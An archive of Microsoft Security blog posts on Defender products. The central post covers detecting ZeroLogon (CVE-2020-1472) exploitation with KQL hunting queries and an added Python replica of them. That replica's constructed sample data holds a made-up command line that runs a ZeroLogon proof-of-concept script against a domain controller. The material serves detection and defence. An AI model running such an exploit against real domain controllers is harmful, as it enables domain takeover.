Archive for the ‘Microsoft Defender Advanced Threat Protection’ Category

Digital Defense integrates with Microsoft to detect attacks missed by traditional endpoint security

December 8th, 2020 No comments

This blog post is part of the Microsoft Intelligent Security Association (MISA) guest blog series. You can learn more about MISA here.

Cybercriminals have ramped up their initial compromises through phishing and pharming attacks, using a variety of tools and tactics that, while numerous, are simple and often go undetected. One factor that attackers continue to rely on to obscure their activity and remain undetected is dwell time.

Dwell time is the interval between the initial compromise and the point when the attack campaign is identified. While industry reports offer differing averages for dwell time, I have yet to see reporting that presents an average below the 50 to 60-day range. Read more about advanced endpoint protection and dwell time.

Bolster Your Advanced Endpoint Protection (AEP)

Download the Digital Defense white paper here.

While dwell times have decreased slightly as attackers become less patient, they are still long enough to defeat the plethora of security tools that exist today. The challenge with these tools is their inability to piece together attacker activity over long periods. By the time enough indicators of compromise (IoCs) reveal themselves to be detected, it is often too late to prevent a breach. Most monitoring solutions look for active attacker behavior to identify a potential indicator of compromise. However, the best way to combat dwell time is to identify and eradicate dormant or nascent malware that stays well hidden until it periodically activates.

A layered solution

Frontline Active Threat Sweep™ (Frontline ATS™), integrated with Microsoft Defender for Endpoint, identifies malware designed to actively evade EDR solutions. Frontline ATS™ is part of the Digital Defense Frontline.Cloud platform providing on-demand agentless threat detection that proactively analyzes assets for indications of a malware infection before other agent-based security tools can be deployed. When integrated, Frontline ATS augments Defender for Endpoint’s capabilities by identifying hidden IoCs without adding agents.


The ability to stay undetected for long periods of time is one of the most common and challenging tactics that attackers use to execute a successful breach. In addition, even when a security team using monitoring tools or an incident response (IR) service is able to detect a threat and clean up an infection, it is common to see it repeatedly resurface. This happens because, even though all active indicators of the threat have been investigated and addressed, the initial and often inactive malware installation can go undiscovered precisely because it is inactive, and it can later be re-activated to restart the infection. With Frontline ATS and Defender for Endpoint, security teams can find any source, artifact, or inactive remnant of malware that could restart the attack campaign. Together, Defender for Endpoint and Frontline ATS provide comprehensive and unobtrusive advanced endpoint detection, protection, and response, drastically improving the security operations team’s effectiveness at preventing breaches.

To learn about the Digital Defense Frontline ATS integration with Microsoft Defender for Endpoint, please visit our listing in the Microsoft Azure Marketplace or visit Digital Defense to learn more.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

For more information about Microsoft Security Solutions, visit the Microsoft Security website. Bookmark the Security blog to keep up with our expert coverage of security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Digital Defense integrates with Microsoft to detect attacks missed by traditional endpoint security appeared first on Microsoft Security.

Zerologon is now detected by Microsoft Defender for Identity

November 30th, 2020 No comments

There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. Microsoft Defender for Identity along with other Microsoft 365 Defender solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.

Here is a sneak peek into our detection lifecycle.

Whenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected WannaCry attacks and with the alert for Suspected SMB (Server Message Block) packet manipulation (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.

In the two months since CVE-2020-1472 was first disclosed, interest in this detection increased rapidly, even though we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and working exploits are built.

This lack of activity changed on September 13, when we observed a surge in alerts. The increase coincided with the publication of several proof-of-concept tools and demo exploits that leverage the vulnerability.


Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020

Microsoft Defender for Identity can detect this attack early on: its sensors inspect Netlogon channel traffic to domain controllers and flag exploitation attempts against it.


Figure 2: Alert page experience

With this Microsoft Defender for Identity alert, you will be able to identify:

  • The device that attempted the impersonation.
  • The domain controller.
  • The targeted asset.
  • Whether the impersonation attempts were successful.

Finally, customers using Microsoft 365 Defender can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from Microsoft Defender for Endpoint. This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.

A close look at some of the earliest ZeroLogon attacks

ZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario it requires an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, Microsoft Threat Experts observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their foothold in organizations that, a month after a patch became available, were still running unpatched domain controllers.


Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale

One of the adversaries noticed by our analysts was interesting because the attacker leveraged an older SharePoint vulnerability (CVE-2019-0604) to remotely exploit unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting the domain controllers it found with the ZeroLogon exploit.

Using the @MsftSecIntel Twitter handle, we publicly shared some file indicators used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoint.


Hunting for ZeroLogon in Microsoft 365 Defender

Combining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products, constantly attempting to combine alerts and events using correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&CK framework, and machine learning models.

In this section, we provide an example (in the simplified form of an advanced hunting query) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.

The following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.


First, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.

// Find all Netlogon exploit attempt alerts containing source devices
let queryWindow = 3d;
AlertInfo
| where Timestamp > ago(queryWindow)
| where ServiceSource == "Azure ATP"
| where Title == "Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)"
| join (AlertEvidence
| where Timestamp > ago(queryWindow)
| where EntityType == "Machine"
| where EvidenceDirection == "Source"
| where isnotempty(DeviceId)
) on AlertId
| summarize by AlertId, DeviceId, Timestamp

Next, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:

// Find potential endpoint Netlogon exploit evidence from AlertId
let NLAlertId = "insert alert ID here";
// Window around the Defender for Identity alert time in which to look for the exploit's RPC traffic
let lookAhead = 1m;
let lookBehind = 6m;
// Source machine(s) named in the alert, with the earliest evidence timestamp per device
let NLEvidence = AlertEvidence
| where AlertId == NLAlertId
| where EntityType == "Machine"
| where EvidenceDirection == "Source"
| where isnotempty(DeviceId)
| summarize Timestamp=arg_min(Timestamp, *) by DeviceId;
let sourceMachine = NLEvidence | distinct DeviceId;
let alertTime = todatetime(toscalar(NLEvidence | distinct Timestamp));
// Connections from the source machine to the RPC endpoint mapper (135) and to the dynamic RPC port
// the exploit is then directed to. The 49670..49680 range is a narrow heuristic: the default dynamic
// RPC range on Windows Server is 49152-65535, so widen it if the exploit's traffic is not found.
DeviceNetworkEvents
| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead))
| where DeviceId in (sourceMachine)
| where RemotePort == 135 or RemotePort between (49670 .. 49680)
// Keep the earliest connection per source/target pair and collect the set of ports contacted
| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl
| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl

The result is one row per source device and target domain controller, carrying the earliest matching connection’s initiating process name, command line and account SID, plus the set of remote ports contacted.

Tying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.
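As an added example that is not part of the post or of Microsoft’s published queries, the following Python re-implements what the two KQL queries above do, over constructed AlertInfo, AlertEvidence and DeviceNetworkEvents records (dict keys mirror the column names; every value, device, SID and command line is made up). The first function returns the source devices named in recent Netlogon alerts; the second takes one alert ID and returns the earliest RPC connection from that device to the domain controller inside the 6-minutes-before / 1-minute-after window, with the set of remote ports contacted. The sample deliberately includes the cases the filters are meant to exclude (traffic on other ports, the same device’s routine RPC traffic outside the window, and another device’s traffic), so the effect of each filter can be checked without a tenant. The port list keeps the query’s narrow 49670-49680 heuristic; the Windows Server default dynamic RPC range is 49152-65535, so widen it when hunting on real data.

```python
"""Offline replica of the two advanced hunting queries above (an added example, not code
from the post). Dicts mirror the AlertInfo/AlertEvidence/DeviceNetworkEvents columns the
queries use; every sample value below is constructed."""
from datetime import datetime, timedelta

NETLOGON_ALERT_TITLE = "Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)"
ALERT_SOURCE = "Azure ATP"          # ServiceSource value the post's query matches on
LOOK_BEHIND, LOOK_AHEAD = timedelta(minutes=6), timedelta(minutes=1)
RPC_ENDPOINT_MAPPER = 135
# Same narrow dynamic-port heuristic as the KQL; the Windows Server default dynamic RPC
# range is 49152-65535, so widen this if the exploit's traffic is not found.
DYNAMIC_RPC_PORTS = range(49670, 49681)

def parse_ts(text):
    return datetime.fromisoformat(text)

def evidence(alert_id, ts, direction, device_id):
    """One AlertEvidence-shaped record for a Machine entity."""
    return {"AlertId": alert_id, "Timestamp": parse_ts(ts), "EntityType": "Machine",
            "EvidenceDirection": direction, "DeviceId": device_id}

def net_event(report_id, ts, device_id, device_name, remote_ip, remote_url, port, proc, cmdline, sid):
    """One DeviceNetworkEvents-shaped record."""
    return {"ReportId": report_id, "Timestamp": parse_ts(ts), "DeviceId": device_id,
            "DeviceName": device_name, "RemoteIP": remote_ip, "RemoteUrl": remote_url,
            "RemotePort": port, "InitiatingProcessFileName": proc,
            "InitiatingProcessCommandLine": cmdline, "InitiatingProcessAccountSid": sid}

# Constructed sample telemetry (not real data).
ALERT_INFO = [
    {"AlertId": "da1", "Timestamp": parse_ts("2020-09-14T10:00:30"), "ServiceSource": ALERT_SOURCE,
     "Title": NETLOGON_ALERT_TITLE},
    {"AlertId": "da2", "Timestamp": parse_ts("2020-09-14T11:00:00"), "ServiceSource": ALERT_SOURCE,
     "Title": "Suspected identity theft (pass-the-hash)"},
]
ALERT_EVIDENCE = [
    evidence("da1", "2020-09-14T10:00:30", "Source", "dev-ws01"),
    evidence("da1", "2020-09-14T10:00:30", "Destination", "dev-dc01"),
    evidence("da2", "2020-09-14T11:00:00", "Source", "dev-ws02"),
]
WS01, DC01 = ("dev-ws01", "ws01.corp.example"), ("10.0.0.5", "dc01.corp.example")
POC = "python.exe cve-2020-1472-poc.py dc01 10.0.0.5"     # made-up exploit command line
USER, SYSTEM = "S-1-5-21-1-2-3-1001", "S-1-5-18"
DEVICE_NETWORK_EVENTS = [
    # Exploit tool: endpoint mapper, then the dynamic Netlogon port, 110 s before the alert
    net_event(10, "2020-09-14T09:58:40", *WS01, *DC01, 135, "python.exe", POC, USER),
    net_event(11, "2020-09-14T09:58:41", *WS01, *DC01, 49672, "python.exe", POC, USER),
    # Unrelated HTTPS traffic from the same device: dropped by the port filter
    net_event(12, "2020-09-14T09:58:42", *WS01, "203.0.113.10", "updates.example.net", 443,
              "msedge.exe", "msedge.exe", USER),
    # Routine RPC to the DC 20 minutes earlier: dropped by the time window
    net_event(5, "2020-09-14T09:40:00", *WS01, *DC01, 135, "svchost.exe", "svchost.exe -k netsvcs", SYSTEM),
    # Another workstation's RPC to the DC, half an hour before its own (non-Netlogon) alert
    net_event(13, "2020-09-14T10:30:00", "dev-ws02", "ws02.corp.example", *DC01, 135, "svchost.exe",
              "svchost.exe -k netsvcs", SYSTEM),
]

def netlogon_alert_sources(alert_info, alert_evidence, now, window=timedelta(days=3)):
    """First query: (AlertId, DeviceId, Timestamp) per source machine in a recent Netlogon alert."""
    since = now - window
    alert_ids = {a["AlertId"] for a in alert_info if a["Timestamp"] > since
                 and a["ServiceSource"] == ALERT_SOURCE and a["Title"] == NETLOGON_ALERT_TITLE}
    return sorted({(e["AlertId"], e["DeviceId"], e["Timestamp"]) for e in alert_evidence
                   if e["Timestamp"] > since and e["AlertId"] in alert_ids and e["EntityType"] == "Machine"
                   and e["EvidenceDirection"] == "Source" and e.get("DeviceId")})

def netlogon_exploit_evidence(alert_id, alert_evidence, network_events):
    """Second query: earliest RPC connection (lowest ReportId) per source/target pair in the window."""
    sources = [e for e in alert_evidence if e["AlertId"] == alert_id and e["EntityType"] == "Machine"
               and e["EvidenceDirection"] == "Source" and e.get("DeviceId")]
    if not sources:
        return []
    source_ids = {e["DeviceId"] for e in sources}
    alert_time = min(e["Timestamp"] for e in sources)
    lo, hi = alert_time - LOOK_BEHIND, alert_time + LOOK_AHEAD
    groups = {}
    for ev in network_events:
        if ev["DeviceId"] not in source_ids or not lo <= ev["Timestamp"] <= hi:
            continue
        if ev["RemotePort"] != RPC_ENDPOINT_MAPPER and ev["RemotePort"] not in DYNAMIC_RPC_PORTS:
            continue
        key = (ev["DeviceId"], ev["DeviceName"], ev["RemoteIP"], ev["RemoteUrl"])
        group = groups.setdefault(key, {"first": ev, "ports": set()})
        group["ports"].add(ev["RemotePort"])
        if ev["ReportId"] < group["first"]["ReportId"]:      # arg_min(ReportId, ...)
            group["first"] = ev
    return [{"SourceDeviceId": dev, "SourceComputerName": name, "TargetDeviceIP": ip,
             "TargetComputerName": url, "Timestamp": g["first"]["Timestamp"],
             "InitiatingProcessFileName": g["first"]["InitiatingProcessFileName"],
             "InitiatingProcessCommandLine": g["first"]["InitiatingProcessCommandLine"],
             "InitiatingProcessAccountSid": g["first"]["InitiatingProcessAccountSid"],
             "TargetDevicePorts": sorted(g["ports"])}
            for (dev, name, ip, url), g in groups.items()]

if __name__ == "__main__":
    now = parse_ts("2020-09-14T12:00:00")
    for alert_id, device_id, ts in netlogon_alert_sources(ALERT_INFO, ALERT_EVIDENCE, now):
        print(f"alert {alert_id}: source device {device_id} at {ts}")
        for row in netlogon_exploit_evidence(alert_id, ALERT_EVIDENCE, DEVICE_NETWORK_EVENTS):
            print("  ", row)
```

Run it directly to print the correlated rows; with the sample data it yields a single row for ws01 against dc01, initiated by the made-up exploit process, with ports 135 and 49672. Replace the constructed lists with advanced hunting exports to apply the same logic to real telemetry.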

Defend against ZeroLogon

Learn more about the alert here, along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.

Also, feel free to review our guidance on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability.

Customers with Microsoft Defender for Endpoint can get additional guidance from the threat analytics article available in Microsoft Defender Security Center.

Get started today

Are you just starting your Microsoft Defender for Identity journey? Begin a trial of Microsoft 365 Defender to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.

Join the Microsoft Defender for Identity Tech Community for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zerologon is now detected by Microsoft Defender for Identity appeared first on Microsoft Security.

Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security

October 5th, 2020 No comments

Phishing is still one of the most significant risk vectors facing enterprises today. Innovative email security technology like Microsoft Defender for Office 365 stops a majority of phishing attacks before they hit user inboxes, but no technology in the world can prevent 100 percent of phishing attacks from hitting user inboxes. At that point in time, your employees become your defenders. They must be trained to recognize and report phishing attacks. But not all training is equally effective.

This blog examines the current state of security awareness training, including how you can create an intelligent solution to detect, analyze, and remediate phishing risk. You’ll also learn about an upcoming event to help you get data-driven insights to compare your current phishing risk level against your peers.

A new reality for cybersecurity

The Chief Information Security Officer (CISO) at a modern enterprise must contend with a myriad of threats. The hybrid mix of legacy on-premises systems and cloud solutions, along with the proliferation of employee devices and shadow IT, means your security team needs a new and comprehensive view of phishing risk across the organization. Self-reported training completion metrics don’t provide insights into behavior changes or risk reduction, leading CISOs to distrust these metrics. Improvement in employee behavior becomes difficult to measure, leaving them unsure whether employee behavior has improved at all.

Many information workers view security awareness training as a tedious interruption that detracts from productivity. Often when an employee is compromised during a simulated attack, they find the ensuing training to be punitive and navigate away from the training like nothing happened. Worse, simulations are often out-of-context and don’t make sense for the employee’s industry or function.

People-centric protection

Making secure behaviors a part of people’s daily habits requires a regular program of targeted education combined with realistic simulations. That means regular breach and attack simulations against endpoints, networks, and cloud security controls. Microsoft Defender for Office 365 now features simulations to help you detect and remediate phishing risks across your organization. Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, helps you gain visibility into organizational risk, baseline against predicted compromise rates, and prioritize remediation. To learn more about this capability, watch the product launch at Microsoft Ignite 2020.

Terranova Security employs a pedagogical approach to cybersecurity, including gamification and interactive sessions designed to engage users’ interest. The simulations are localized for employees around the world and follow the highest web content accessibility guidelines (WCAG) 2.1. You will be able to measure employee behavior changes and deploy an integrated, automated security awareness program built on three pillars of protection:

  • Simulate real threats: Detect vulnerabilities by using real lures (actual phishing emails) and templates, training employees on the most up-to-date threats. Administrators can automate and customize simulations, including payload attachment, user targeting, scheduling, and cleanup. Azure Active Directory (AAD) groups automate user importing, and the vast library of training content enables personalized training based on a user’s vulnerability score or simulation performance.
  • Remediate intelligently: Quantify your social engineering risk across employees and threat vectors to accurately target remedial training. Measure the behavioral impact and track your organization’s progress against a baseline compromise rate. Set up automated repeat offender simulations with the user susceptibility metric and add context by correlating behavior with a susceptibility score.
  • Improve your security posture: Reinforce your human security system with hyper-targeted training designed to change employee behavior. Attack Simulation Training in Microsoft Defender for Office 365 provides “nano learnings” and “micro learnings” to cater to diverse learning styles and reinforce awareness.

Check your threat level

Coinciding with National Cyber Security Awareness Month (NCSAM), Terranova will release the results of the Terranova Security Gone Phishing Tournament™ at the end of October. This popular event helps security leaders get an up-to-the-minute picture of their organization’s phishing click rate. Terranova launched this campaign back in August and supplied a free phishing simulation to its applicants, enabling them to benchmark themselves against their peers with accurate click-rate data for comparison.

Co-sponsored by Microsoft, the Terranova Security Gone Phishing Tournament uses an email template from Attack simulation training, a new capability of Microsoft Defender for Office 365 (formerly Office 365 ATP) releasing later this year, that acts as an intelligent social engineering risk management tool using context-aware simulations and targeted training.

To learn more about Microsoft Security solutions, visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security appeared first on Microsoft Security.

Microsoft delivers unified SIEM and XDR to modernize security operations

September 22nd, 2020 No comments

The threat landscape continues to increase in both complexity and the level of sophistication of the attacks we observe. Attackers target the most vulnerable resources in an organization and then traverse laterally to target high-value assets. No longer can you expect to stay safe by protecting individual areas such as email or endpoints. Extended detection and response (XDR) is a new approach, defined by industry analysts, designed to deliver intelligent, automated, and integrated security across domains to help defenders connect seemingly disparate alerts and get ahead of attackers.

At today’s virtual Ignite conference, Microsoft is announcing a unique approach that empowers security professionals to get ahead of today’s complex threat landscape with integrated SIEM and XDR tools from a single vendor so you get the best of both worlds – end-to-end threat visibility across all of your resources; correlated, prioritized alerts based on the deep understanding Microsoft has of specific resources and AI that stitches that signal together; and coordinated action across the organization. With the combination of SIEM and XDR, defenders are now armed with more context and automation than ever and can leverage the time saved to apply their unique expertise within their own environment to proactively hunt and implement threat preventions.

As part of this announcement, we are unifying all XDR technologies under the Microsoft Defender brand. The new Microsoft Defender is the most comprehensive XDR in the market today and prevents, detects, and responds to threats across identities, endpoints, applications, email, IoT, infrastructure, and cloud platforms. With Microsoft Defender we are both rebranding our existing threat protection portfolio and adding new capabilities, including additional multi-cloud (Google Cloud and AWS) and multi-platform (Windows, Mac, Linux, Android, and iOS) support.

Microsoft Defender is delivered in two tailored experiences, Microsoft 365 Defender for end-user environments and Azure Defender for cloud and hybrid infrastructure.

Microsoft 365 Defender

Microsoft 365 Defender delivers XDR capabilities for identities, endpoints, cloud apps, email and documents. It uses artificial intelligence to reduce the SOC’s work items, and in a recent test we consolidated 1,000 alerts to just 40 high-priority incidents. Built-in self-healing technology fully automates remediation more than 70% of the time, ensuring defenders can focus on other tasks that better leverage their knowledge and expertise.

Today, we are making the following branding changes to unify the Microsoft 365 Defender technologies:

  • Microsoft 365 Defender (previously Microsoft Threat Protection).
  • Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection).
  • Microsoft Defender for Office 365 (previously Office 365 Advanced Threat Protection).
  • Microsoft Defender for Identity (previously Azure Advanced Threat Protection).

New features within Microsoft 365 Defender will also be available:

  • Mobile threat defense in Microsoft Defender for Endpoint is extended to iOS (now in preview), and Android support moves to general availability (GA). As a result, Microsoft now delivers endpoint protection across all major OS platforms. Learn more about the latest in our endpoint security journey.
  • Extension of current macOS support with the addition of threat and vulnerability management. You can learn more here.
  • Priority account protection in Microsoft Defender for Office 365 will help security teams focus on protection from phishing attacks for users who have access to the most critical and privileged information. Customers can customize prioritized account workflows to offer these users an added layer of protection. Learn more here.

An image of the Microsoft 365 Defender dashboard.


Azure Defender

Azure Defender delivers XDR capabilities to protect multi-cloud and hybrid workloads, including virtual machines, databases, containers, IoT, and more. Azure Defender is an evolution of the Azure Security Center threat protection capabilities and is accessed from within Azure Security Center.

Aligned with the Microsoft 365 brand changes, today we are announcing brand changes for these capabilities under Azure Defender, for example:

  • Azure Defender for Servers (previously Azure Security Center Standard Edition).
  • Azure Defender for IoT (previously Azure Security Center for IoT).
  • Azure Defender for SQL (previously Advanced Threat Protection for SQL).

We are also announcing new features within Azure Defender:

  • To help defenders identify and mitigate unprotected resources we are delivering a new unified experience for Azure Defender that makes it easy to see which resources are protected and which need protection. This updated experience can be accessed here and will be made broadly available later this month.
  • Added protection for SQL servers on-premises and in multi-cloud environments as well as virtual machines in other clouds, and improved protections for containers, including Kubernetes-level policy management and continuous scanning of container images in container registries.
  • Support for operational technology networks with the integration of CyberX into Azure Defender for IoT.

An image of Defender.


Azure Sentinel

The XDR capabilities of Microsoft Defender, delivered through Azure Defender and Microsoft 365 Defender, provide rich insights and prioritized alerts, but to gain visibility across your entire environment and include data from other security solutions such as firewalls and existing security tools, we connect Microsoft Defender to Azure Sentinel, our cloud-native SIEM.

Azure Sentinel is deeply integrated with Microsoft Defender so you can integrate your XDR data in only a few clicks and combine it with all your security data from across your entire enterprise.

Today, we are announcing new features within Azure Sentinel:

  • The new entity behavior analytics view makes it easier to diagnose compromised accounts or malicious insiders.
  • Simplify management of threat intelligence by including the ability to search, add, and track threat indicators, perform threat intelligence lookups, and create watchlists. To learn more about these in detail, check out the Azure Sentinel blog.

An image of Azure Sentinel.


Modernize your security operations

Some vendors deliver XDR, some deliver SIEM. Microsoft believes that defenders can benefit from using deeply integrated SIEM and XDR for end-to-end visibility and prioritized actionable insights across all your enterprise assets. We are committed to delivering the best-integrated experience with the broadest coverage of resources to help simplify your world.

Thank you for your continued partnership and invaluable input on this journey to deliver the most comprehensive threat protection to our global customers.

Infographic of Microsoft 365 Defender and Azure Defender

YouTube video: Microsoft Defender, Extended Detection and Response (XDR) | Microsoft Ignite 2020

Stay healthy. Stay safe.

-Rob & our entire Microsoft Security Team

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft delivers unified SIEM and XDR to modernize security operations appeared first on Microsoft Security.

Microsoft announces cloud innovation to simplify security, compliance, and identity

September 22nd, 2020 No comments

2020 will be remembered as a year of historic transformation. The pandemic has changed the way businesses operate and people work. One thing that has not changed is our basic human nature and the need to feel safe. Being safe and feeling safe is what allows us to do more, create more, and have trust in the technology that connects us all.

It’s no wonder, then, that cybersecurity is so important right now. Digital security is about people—it’s about empowering defenders to defend and protect employees, data, work, and personal safety. It’s about making people and organizations resilient in an environment of unexpected change, like widespread remote work. Nearly overnight, organizations worldwide have had to enable remote workforces, support rapidly evolving business requirements, and steer to the next normal without knowing what that normal would be.

All of this takes place against a backdrop of advanced threats and adversaries. For example, Microsoft threat intelligence teams recently exposed cyberattacks targeting people and organizations involved in the upcoming U.S. presidential election including unsuccessful attacks on people associated with both presidential campaigns from a variety of foreign activity groups known to Microsoft as Strontium, Zirconium, and Phosphorus.

For those responsible for securing their organization’s digital infrastructure, this has all come on top of what they were already navigating—levels of complexity that often translate into barriers for companies, their people, and the customers they serve. That’s why we’re so passionate about reimagining security, identity, and compliance. We hold a differentiated view among our peers that security should not only encompass all critical aspects of security—including cybersecurity, identity, and compliance – but that these components should be tightly integrated, and built right into the products and platforms that businesses are already using, so that managing safe access, securing data, meeting regulatory requirements and protecting against threats is seamless.

Countless innovative companies like ASOS, CenturyLink, Erie Insurance, Frost Bank, Rabobank, Unilever, Rockefeller Capital Management, Uniper, Komatsu, and The Little Potato Company; and public sector organizations including the US Department of Defense, New Jersey Administrative Office of the Courts, Ashford & St. Peter’s Hospitals (NHS), St. Luke’s, and Durham University are tapping into the Microsoft cloud to help secure their futures. Today we’re delivering a new set of security, compliance, and identity innovations to help all customers simplify and modernize their environments by embracing the reality that the past seven months have likely reshaped the next 10 years of security and digital transformation.

Modern security with a new Microsoft Defender

Poor security posture is often rooted in complexity. Security teams have historically struggled to keep up with threats and signals across a patchwork of poorly integrated solutions that fail to cover the breadth of workloads, clouds, and devices that businesses run on. Fortunately, the cloud has given rise to a new generation of modern security tools that simplify the defender experience by combining signals and automating responses to catch threats that would otherwise go unchecked. The most important emerging tools are Extended Detection and Response (XDR) and cloud-native Security Information & Event Management (SIEM). Most vendors only offer one or the other.

Microsoft offers a unique approach that empowers security professionals with both cloud-native SIEM and XDR tools from a single vendor. This brings a new level of integration that gives defenders the best of both worlds: end-to-end visibility across all of their resources, and intelligent alerts built with a deep understanding of individual resources, enhanced with human and machine intelligence.

Today we are making the following announcements to simplify the defender experience with modern and integrated capabilities:

  • We are unifying all of our XDR capabilities together and rebranding them as Microsoft Defender, inclusive of Microsoft 365 Defender and Azure Defender.
  • Microsoft Defender offers the broadest resource coverage of any XDR in the industry, spanning identities, endpoints, cloud apps, email and docs, infrastructure, and cloud platforms.
  • Microsoft Defender uses powerful workflows and AI to correlate alerts across attack vectors, provide an end-to-end view of the attack, and automatically heal affected assets.

In addition to bringing our XDR together under Microsoft Defender, we are also announcing new Defender capabilities:

  • Microsoft Defender for Endpoint is now available for all major platforms, with the general availability of protection for Android devices and a preview for iOS.
Microsoft Defender for Endpoint on an Android device
  • Azure Defender has a new unified dashboard experience within Azure Security Center that gives you visibility into your alerts and which resources are currently monitored.
  • Azure Defender has new protections for SQL on-premises, Azure Kubernetes, Azure Key Vault, and IoT.
  • Azure Defender for IoT now protects industrial IoT, Operational Technology (OT), and building management systems (BMS) through the integration of agentless capabilities for securing unmanaged devices from CyberX, which Microsoft acquired in June.

Our cross-domain detection and response capabilities from Microsoft Defender are deeply integrated with our cloud-native SIEM, Azure Sentinel, reducing complexity and increasing visibility so that defenders see what matters when it matters.  In Azure Sentinel we are announcing:

  • Improvements to threat intelligence management and new integrations with threat intelligence partners, including the ability to search, add, and track threat indicators, perform TI look-ups, and enrichments as well as creating watchlists for hunting threats—so you can catch more threats, faster.
  • User and entity behavior analytics that help SecOps detect unknown threats and anomalous behavior of compromised users and insider threats. New insights are unlocked with user and entity behavior profiles that leverage machine learning and Microsoft’s security research.
  • To help Microsoft 365 E5 customers modernize faster, we are offering promotional pricing that will save the typical 3,500 seat deployment $1,500 per month—for a limited time, beginning in November 2020.

ASOS, a leading online fashion retailer, is using Azure Sentinel to detect attacks even while their security team is working remotely during the pandemic.

Stuart Gregg, Cyber Security Operations Lead, ASOS

“With everything running through Azure Sentinel, we’ve reduced the time spent on case management and resolution of alerts by approximately 50 percent,” said Stuart Gregg, Cyber Security Operations Lead, ASOS.

In addition to the XDR and SIEM news, we are enhancing security posture management in Azure Security Center with support for multi-cloud.  Now you can see all your Azure, AWS, and GCP security posture in a unified experience within Azure Security Center. Learn more about today’s Azure security announcements here.

Compliance, simplified

Our compliance cloud solutions help customers more easily navigate today’s biggest risks, from managing data or finding insider threats to dealing with legal issues or even addressing standards and regulations. We’ve listened to customers and invested heavily in a set of solutions to help them modernize and keep pace with the evolving and complex compliance and risk management challenges they face.

  • One of our key investment areas is the set of Data Loss Prevention products in Microsoft 365. We recently announced the public preview of Microsoft Endpoint Data Loss Prevention (DLP), which means customers can now identify and protect data on devices. Today, we are announcing the public preview of integration between Microsoft Cloud App Security and Microsoft Information Protection, which extends Microsoft’s data loss prevention (DLP) policy enforcement framework to third-party cloud apps, such as Dropbox, Box, Google Drive, Webex, and more, for a consistent and seamless compliance experience.
  • Customers struggle to keep up with constantly changing data protection regulations. To help ease this challenge, we are excited to announce the general availability of Compliance Manager, which helps businesses simplify compliance and reduce risk by translating complex regulatory requirements into specific controls and, through a compliance score, gives them a quantifiable measure of their compliance.
